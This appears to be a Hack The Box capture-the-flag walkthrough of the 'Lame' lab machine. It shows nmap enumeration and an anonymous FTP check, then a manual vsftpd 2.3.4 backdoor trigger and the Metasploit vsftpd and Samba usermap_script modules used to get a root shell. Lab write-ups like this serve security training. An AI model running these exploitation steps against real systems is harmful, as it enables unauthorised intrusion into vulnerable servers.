Let’s begin with an easy Linux machine called “Lame”.
We start by enumerating the box as this is the first step to gather information. I begin by finding out the open ports with nmap.
nmap -sC -sV -oA lame_initial_scan 10.10.10.3
The -sC flag for the default scripts, the -sV one to enumerate versions and the -oA to save the output.
Nmap scan report for 10.10.10.3
Host is up (0.020s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.12
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 — secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: -3d00h57m06s, deviation: 2h49m43s, median: -3d02h57m07s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2020–09–30T08:38:37–04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
FTP, SSH and SMB are on there. There are a few options here.
Anonymous login is allowed on the FTP. We could try that as we would normally want to know if there is something interesting there. The username and password are: anonymous:anonymous
└──╼ [★]$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp>
In this case we don’t find anything because the machine is meant to be exploited through another route. So far we don’t have a username in order to try and brute-force the SSH and there is no webpage for us to look at.
Running a searchsploit search for the FTP service in this case — vsftpd.
We see a Backdoor Command Execution exploit for the exact version found earlier with the nmap scan. We can run metasploit and give it a try since we see it’s a module.
We launch metasploit with:
msfconsole
We select the module and take a look at the available options:
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
We can set the target host and run the exploit.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit[*] 10.10.10.3:21 — Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 — USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
It does not work. We can try the exploit manually. The steps can be found with a simple google search here.
└──╼ [★]$ telnet 10.10.10.3 21
Trying 10.10.10.3…
Connected to 10.10.10.3.
Escape character is ‘^]’.
220 (vsFTPd 2.3.4)
USER thenguen:)
331 Please specify the password.
PASS thenguen
We check to see if the port for the backdoor is now open.
└──╼ [★]$ nmap -p 6200 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–03 16:28 UTC
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.05 seconds
No luck. Let’s try SMB.
smbclient -L 10.10.10.3
We don’t have permissions to view opt so lets look at the tmp folder.
smbclient \\\\10.10.10.3\\tmp
Nothing looks very interesting so let’s search for exploits for the SMB version.
searchsploit samba 3.0
We find some metasploit modules again so we search within metasploit.
We try the exploit with the excellent rank.
use exploit/multi/samba/usermap_script
Set the target and run it.
If everything is right you should get a shell.
Since the shell is ugly we check for python to open a proper bash shell.
The flags are located at the standard place.
Since we are running as root we can read them both.
That was it for this box. It’s quite easy as you see.
I hope you enjoyed it. Cya around.
